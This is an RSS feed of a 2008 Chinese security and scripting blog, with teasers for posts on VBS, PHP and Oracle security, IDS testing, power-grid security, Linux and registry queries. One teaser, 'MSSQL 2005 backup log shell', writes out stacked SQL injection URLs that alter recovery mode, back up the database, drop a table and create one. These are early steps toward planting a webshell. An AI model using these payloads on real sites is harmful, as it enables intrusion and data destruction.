谈笑书生's blog http://www.jxroot.com.cn/ 人的头脑太复杂,时间过得久,有时候连自己也被自己骗了,记下来才是最真实的...... Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved. SaBlog-X Version 1.6 Build 20070823 Thu, 24 Jul 2008 10:57:41 +0000 30 http://www.jxroot.com.cn/?action=show&id=143 几段非常有用的脚本 来自微软网站 谈笑书生 一、在网络硬件故障或网络故障断开时发送警告

vbs代码
  1. strComputer = "."    
  2. Set objWMIService = GetObject("winmgmts:" & strComputer & " ootwmi")    
  3. Set colMonitoredEvents = objWMIService.ExecNotificationQuery _    
  4.     ("Select * from MSNdis_StatusMediaDisconnect")    
  5. Do While True    
  6.     Set strLatestEvent = colMonitoredEvents.NextEvent    
  7.     Wscript.Echo "A network connection has been lost:"    
  8.     WScript.Echo strLatestEvent.InstanceName, Now    
  9.     Wscript.Echo    
  10. Loop  


阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=143 技术文章 2008-07-22 12:14 http://www.jxroot.com.cn/?action=show&id=142 vbs做的sql脚本执行工具 谈笑书生 '##################执行多目录下的所有sql脚本的工具#################################
'#可以方便的执行指定的目录或文件到多个服务器多个数据库
'#只会执行以“.sql”后缀的脚本文件
'#执行返回结果会生成报告以文本文件打开

'【请在此过程中填写运行参数】
Sub todo
Dim execTool
Set execTool=new MySqlScriptExecTool



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=142 技术文章 2008-07-22 11:44 http://www.jxroot.com.cn/?action=show&id=141 VBS脚本教程二 谈笑书生 例五:关机菜单立刻显身

打开记事本,输入以下命令,并将其保存为1.vbs:

set WshShell = CreateObject("WScript.Shell")

WshShell.SendKeys "^{ESC}u"

双击运行它,你会发现关机菜单立刻出现了。

将“WshShell.SendKeys "^{ESC}u"”改为“WshShell.SendKeys "^+{ESC}"”,运行一下看看是否打开了任务管理器



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=141 技术文章 2008-07-22 11:41 http://www.jxroot.com.cn/?action=show&id=140 VBS脚本教程一 谈笑书生 [作者:临汾市外事旅游局薛靖澜[http://hi.baidu.com/xuejinglan],转载请注明出处]
就像多数计算机教程一样 ,我们从“Hello  World!”程序开始我们的练习。什么?不知道是什么意思?就是说大部分的计算机程序设计教程开篇入门都是编写一个小程序,执行这个程序的结果就是在计算机的屏幕上或者dos窗口中显示一行文字:Hello  World!好了,我们开始吧。

打开你的“记事本”程序,在编辑窗口填写:

msgbox "Hello World!"

然后用鼠标单击“文件”菜单,单击“保存”,把“保存在”一栏设为桌面,在“文件名”一栏中填写kk.vbs,单击“保存”就可以了。然后最小化“记事本”窗口,在桌面上寻找你刚刚保存的kk.vbs,然后双击。看到弹出的对话框了没有,单击“确定”,对话框消失了。难看了点,不过确实是你编写的第一个脚本程序。



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=140 技术文章 2008-07-22 11:37 http://www.jxroot.com.cn/?action=show&id=139 用vbs来写sql注入等80端口的攻击脚本 谈笑书生 转自CNSST[www.cnsst.org]

昨天晚上在机器里乱翻时无意打开一个vbs脚本,突然发现一个以前没有见过的对象Test.SendRequest("http://" & g_sServer & "/testfiles/browser.asp"),虽然对象没有见过,但是意思很明显:发送http请求。本来以为是WMI script API的东东,但是没有找到创建对象的语句,这个脚本在Microsoft ACT里,Microsoft ACT是Visual Studio.Net带的一个测试站点的工具(Long,未来有用过这个吗?如果没有,你看这个如何?),以前打开过,但是没有研究过如何使用,于是我打开帮助文件(查过MSDN里有:ms-help://MS.VSCC/MS.MSDNVS.2052/act/htm/actml_main.htm),大致的读了一下,竟然是一整套的HTTP客户端对象(不知道这样说是不是准确),把对象和属性列出来,你看了就可以知道了,以下是Test对象模型,还有个application对象模型,如果你有深入了解的兴趣请看msdn,我还在学习中:



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=139 技术文章 2008-07-22 11:33 http://www.jxroot.com.cn/?action=show&id=138 Oracle数据库安全性设计建议 谈笑书生 一、 什么是安全的系统
安全性建设是一个长期并且卓绝的工作。作为一个符合标准的企业级系统,我们认为税务系统应该具备以下的安全性特点:
高可用性
对敏感数据的访问控制能力。
监测用户行为的审计能力。
用户帐号管理的有效性和扩充性

二、 从哪些方面作安全性检查
一个企业级系统的安全性建设并不仅仅局限于软件技术方面的设置和控制,甚至我们可以说,技术仅仅位于一个补充和提高现有安全性的地位上。通常,应该按照重要性依次进行如下的安全性检查。



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=138 信息安全 2008-07-22 11:14 http://www.jxroot.com.cn/?action=show&id=137 PHP 安全及相关 谈笑书生 关注安全问题的重要性
看到的远非全部

阻止用户恶意破坏你的程式最有效却经常被忽略的方法是在写代码时就考虑它的可能性。留意代码中可能的安全问题是很重要的。考虑下边的旨在简化用PHP中写入大量文本文件的过程的实例函数:

PHP代码
  1. <?php    
  2. function write_text($filename$text="") {    
  3. static $open_files = array();    
  4. // 如果文件名空,关闭全部文件    
  5. if ($filename == NULL) {    
  6. foreach($open_files as $fr) {    
  7. fclose($fr);    
  8. ………………  


阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=137 技术文章 2008-07-21 10:24 http://www.jxroot.com.cn/?action=show&id=136 PHP安全之:重燃你的Php安全之火 谈笑书生        对于脚本安全这个话题好像永远没完没了,如果你经常到国外的各种各样的bugtraq上,你会发现有一半以上都和脚本相关,诸如SQL injection,XSS,Path Disclosure,Remote commands execution这样的字眼比比皆是,我们看了之后的用途难道仅仅是抓肉鸡?对于我们想做web安全的人来说,最好就是拿来学习,可是万物抓根源,我们要的不是鱼而是渔。在国内,各种各样的php程序1.0版,2.0版像雨后春笋一样的冒出来,可是,大家关注的都是一些著名的cms,论坛,blog程序,很少的人在对那些不出名的程序做安全检测,对于越来越多的php程序员和站长来说,除了依靠服务器的堡垒设置外,php程序本身的安全多少你总得懂点吧。



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=136 技术文章 2008-07-21 10:16 http://www.jxroot.com.cn/?action=show&id=135 SQL注入攻击-来自微软安全博客的建议 谈笑书生 本文翻译自微软博客上刊载的相关文章,英文原文版权归原作者所有,特此声明。

原文:http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx

本文译言地址:http://www.yeeyan.com/articles/view/hanguofeng/8955

 

(特别感谢Neil Carpenter对本文写作提供的帮助)



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=135 技术文章 2008-07-17 22:51 http://www.jxroot.com.cn/?action=show&id=134 MSSQL 2005 backup log shell 谈笑书生 第一步
http://www.test.com/test.asp?id=1234;alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full--

第二步:
http://www.test.com/test.asp?id=1234;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第三步
http://www.test.com/test.asp?id=1234;drop/**/table/**/[itpro]--

第四步
http://www.test.com/test.asp?id=1234;create/**/table/**/[itpro]([a]/**/image)--



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=134 学习笔记 2008-07-16 01:00 http://www.jxroot.com.cn/?action=show&id=133 IDS入侵检测系统的测试与评估 谈笑书生 随着入侵检测系统的广泛应用,对入侵检测系统进行测试和评估的要求也越来越迫切。开发者希望通过测试和评估发现产品中的不足,用户希望测试和评估来帮助自己选择合适的入侵检测产品。本文根据目前的相关研究,介绍了入侵检测系统测试评估的标准、指标,方法步骤、数据来源、环境配置、测试评估的现状以及其中存在的一些问题。

1 、引言

  随着人们安全意识的逐步提高,入侵检测系统(IDS)的应用范围也越来越广,各种各样的IDS也越来越多。那么IDS能发现入侵行为吗?IDS是否达到了开发者的设计目标?什么样的IDS才是用户需要的性能优良的IDS呢?要回答这些问题,都要对IDS进行测试和评估。

  和其他产品一样,当IDS发展和应用到一定程度以后,对IDS进行测试和评估的要求也就提上日程表。各方都希望有方便的工具,合理的方法对IDS进行科学。公正并且可信地测试和评估。对于IDS的研制和开发者来说,对各种IDS进行经常性的评估,可以及时了解技术发展的现状和系统存在的不足,从而将讲究重点放在那些关键的技术问题上,减少系统的不足,提高系统的性能;而对于IDS的使用者来说,由于他们对IDS依赖程度越来越大,所以也希望通过评估来选择适合自己需要的产品,避免各IDS产品宣传的误导。IDS的用户对测试评估的要求尤为迫切,因为大多数用户对IDS本身了解得可能并不是很深入,他们希望有专家的评测结果作为自己选择IDS的依据。

 



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=133 信息安全 2008-07-04 13:32 http://www.jxroot.com.cn/?action=show&id=132 微软发布3款SQL Injection攻击检测工具 谈笑书生 随着 SQL INJECTION 攻击的明显增多,微软近日发布了三个免费工具,帮助网站管理员和检测存在的风险并对可能的攻击进行拦截。

Scrawlr

下载地址:https://download.spidynamics.com/Products/scrawlr/

这个微软和 HP合作开发的工具,会在网站中爬行,对所有网页的查询字符串进行分 析并发现其中的 SQL INJECTION 风险。Scrawlr 使用了部分 HP WebInspect  相同的技术,但只检测 SQL INJECTION 风险。Scrawlr 从一个起始 URL 入口,爬遍整个网站,并对站点中所有网页进行分析以找到可能存在的漏洞



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=132 信息安全 2008-07-04 13:16 http://www.jxroot.com.cn/?action=show&id=131 电力信息系统的安全风险和威胁行为分析 谈笑书生 1、引言
电力信息系统由网络、设备和数据等要素组成,其中每个要素都存在着各种可被攻击的弱点。网络线路有被窃听的危险;网络连接设备、操作系统和应用系统所依赖的各种软件在系统设计、协议设计、系统实现以及配置等各个环节都存在大量的安全弱点和漏洞,有被利用和攻击的危险。每天都有新的安全漏洞在网上公布,每天都有系统受到攻击和入侵,每天都有计算机犯罪的报道,每天都有人出于好奇或其他目的加入到网络黑客的行列中。而且攻击者的手段也越来越多,面对一个复杂性日益增长的网络环境进行安全需求分析,动态地、发展地认识安全隐患和威胁是安全需求分析的重要前提。只有深入了解电力信息系统的网络发展和应用现状,结合对其网络软硬件设备的基础和原理的专业分析,才能深入了解影响电力系统信息安全的、潜在的矛盾、隐患和现实状况,才能制定出一整套完整而科学的网络安全结构体系,才能从根本上解决电力信息系统的网络安全。

 



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=131 信息安全 2008-07-04 11:27 http://www.jxroot.com.cn/?action=show&id=130 电力行业解决方案 谈笑书生 电力行业特点

  电力行业是国民经济的基础产业,是一切电子设备正常运行的基础,保证持续、高效的电力供应是关系到国计民生的大事,也是电力部门工作注目的焦点。 电力行业与其他行业相比具有分散控制、统一联合运行的特点。系统的运行涉及到发电厂、变电站、调度中心;发、输、配电系统一体化,系统中包括了各种独立系统和联合电网的控制保护技术、通信技术、运行管理技术等。电力行业的信息化从 60-70年代开始的电厂自动化监控开始,到现在已经有30多年。与当时相比,从网络化,数据管理,MIS的应用等方面,电力行业企业信息化不断成熟与完善。但是,与国际电力企业相比,我国信息化水平还存在很大差距,在建设信息化过程中还走了不少弯路,存在一些问题。随着电力行业的不断发展,电力的关键业务不断增长,因此信息化应用也不断增强,网络系统中的应用越来越多。同时,随着Internet技术的发展,建立在Internet架构上的跨地区、全行业系统内部信息网开始逐步建立,网上应用着各种电力业务及办公系统。显而易见,电力信息网络系统的网络安全问题愈来愈显得重要。



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=130 信息安全 2008-07-04 11:18 http://www.jxroot.com.cn/?action=show&id=129 电力网络信息系统的安全风险分析 谈笑书生 摘 要:电力网络信息系统是构建在一个典型的具有Internet、Intranet和 Extranet应用环境的复杂系统。由于Internet是一个开放性的、非可信的网络,因此解决依托Internet的信息系统的安全将是一个非常复杂的系统工程,要求必须建立完整的、可管理的安全体系。这个安全体系涉及以设备为中心的信息安全,技术涵盖网络系统、计算机操作系统、数据库管理系统和应用软件系统;涉及计算机病毒的防范、入侵的监控;涉及以用户(包括内部员工和外部相关机构人员)为中心的安全管理,包括用户的身份管理、身份认证、授权、审计等;涉及信息传输的机密性、完整性、不可抵赖性等等。为了解决这一复杂的信息系统的安全,必须对其可能涉及的所有安全风险有一个清醒的认识。

  根据网络信息系统结构,从系统和应用的角度出发,信息系统的安全因素可以划分到五个安全层中,即物理层、网络层、系统层、应用层、安全管理层。以下是根据这五个层次和电力网络信息系统的特点进行的分析。



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=129 信息安全 2008-07-04 10:55 http://www.jxroot.com.cn/?action=show&id=128 设计电力企业网络安全解决方案 谈笑书生 作者:罗涛
摘 要:通过对安全防护体系、安全策略体系、安全管理体系三个方面,对电力信息网络进行深入分析,从而形成相应的电力信息网络安全解决方案
信息网络技术的高速发展和电力信息系统的不断投入,为电力企业带来了成本降低、效率提高、业务开拓和形象提升等诸多好处,在感受网络所带来优点的同时,企业也体验到病毒、黑客等网络负面因素带来的困扰。所以,建立完备的电力安全防护体系,确保电力系统信息网络得以正常运转,以保护企业的信息资源不受侵害。

通过对安全防护体系、安全策略体系、安全管理体系三个方面,对电力信息网络进行深入分析,从而形成相对应的电力信息网络安全解决方案。



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=128 信息安全 2008-07-04 10:28 http://www.jxroot.com.cn/?action=show&id=127 省电力信息系统安全解决方案 谈笑书生 一、概述

  随着信息化的日益深刻,信息网络技术的应用日益普及,网络安全问题已经会成为影响网络效能的重要问题。而Internet所具有的开放性、国际性和自由性在增加应用自由度的同时,对安全提出了更高的要求。
  电力系统信息安全问题已威胁到电力系统的安全、稳定、经济、优质运行,影响着"数字电力系统"的实现进程。研究电力系统信息安全问题、开发相应的应用系统、制定电力系统信息遭受外部攻击时的防范与系统恢复措施等信息安全战略是当前信息化工作的重要内容。电力系统信息安全已经成为电力企业生产、经营和管理的重要组成部分 。
如何使电力信息网络系统不受黑客和病毒的入侵,如何保障数据传输的安全性、可靠性,也是建设"数字电力系统"过程中所必须考虑的重要事情之一。
网新易尚公司依据自己在信息安全领域的经验,从安全角度出发,并结合自己深入了解的电力网络实际情况提出一套适合于其网络的整体安全解决方案。为省级电力系统切实构架高效、安全、实用的信息系统运行环境。



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=127 信息安全 2008-07-04 10:18 http://www.jxroot.com.cn/?action=show&id=126 gentoo linux自动 挂载U盘 方法 谈笑书生 目前一些主流桌面系统(如Gnome,KDE,Xfce)的较新版本都支持自动挂载(mount)U盘了. 一个流传很广的说法是 HAL(硬件抽象层) 起了自动挂载的作用, 其实这是误解. 对于2.6内核而言, udev 才是直接从内核接收设备连接或断开信息的主体.
udev 从内核得到信息后,根据一些简单规则(注意,是简单规则), 在 /dev 目录下创建相应的设备节点, 并进行某些相关操作. HAL 所做的事情是在 udev 的规则中加上一条(或几条), 让 udev 把收到的信息也传递给 HAL. 接下来, HAL 用更为复杂的规则来匹配和描述当前连接着的硬件. 举一个简单的例子, udev 知道的是U盘已经连接了并且有一个分区; 而 HAL 能更进一步知道这个分区的卷标名及其它一些信息.

上面这些都还不能自动挂载U盘. Gnome 等桌面系统会启动一个守护进程(daemon), 通过 D-Bus 从 HAL 那里得到硬件信息, 如果发现有U盘连接了就由它们来挂载它(实际是调用 pmount).

问题是, 如果你不想用Gnome,KDE,Xfce这些桌面系统, 那么由它们提供的U盘自动挂载功能也就失效了,有解决办法么?



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=126 技术文章 2008-07-02 11:06 http://www.jxroot.com.cn/?action=show&id=125 如何读取注册表RUN项里面有几个键值! 谈笑书生 一、批处理:(保存为.bat或.cmd文件)
1、利用reg query:
@echo off
set r=\Software\Microsoft\Windows\CurrentVersion\Run
for /f "skip=3 delims=" %%a in ('reg query HKLM%r%') do echo.%%a
echo.&echo.&echo.
for /f "skip=3 delims=" %%a in ('reg query HKCU%r%') do echo.%%a
pause

2、利用reg export:
@echo off
md RunInf
pushd RunInf
set r=\Software\Microsoft\Windows\CurrentVersion\Run
>nul reg export HKLM%r% 1
>nul reg export HKCU%r% 2
for /f "skip=2 delims=" %%a in ('type 1') do echo.%%a
echo.&echo.&echo.
for /f "skip=2 delims=" %%a in ('type 2') do echo.%%a
popd
rd/s/q RunInf
pause



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=125 技术文章 2008-07-01 15:40 http://www.jxroot.com.cn/?action=show&id=124 RPM命令手册 谈笑书生 RPM 软件包是非常常见的Linux软件包格式,包括Redhat,Mandrake以及几乎全部的国产Linux在内的很多发行版本都用来作为默认的发行软件包格式。对于RPM格式的基本操作是一个Linuxer应该熟习和掌握的。

一、安装

命令格式:

rpm -i ( or --install) options file1.rpm ... fileN.rpm

参数:

file1.rpm ... fileN.rpm 将要安装的RPM包的文件名



阅读全文

]]> http://www.jxroot.com.cn/?action=show&id=124 技术文章 2008-06-29 13:22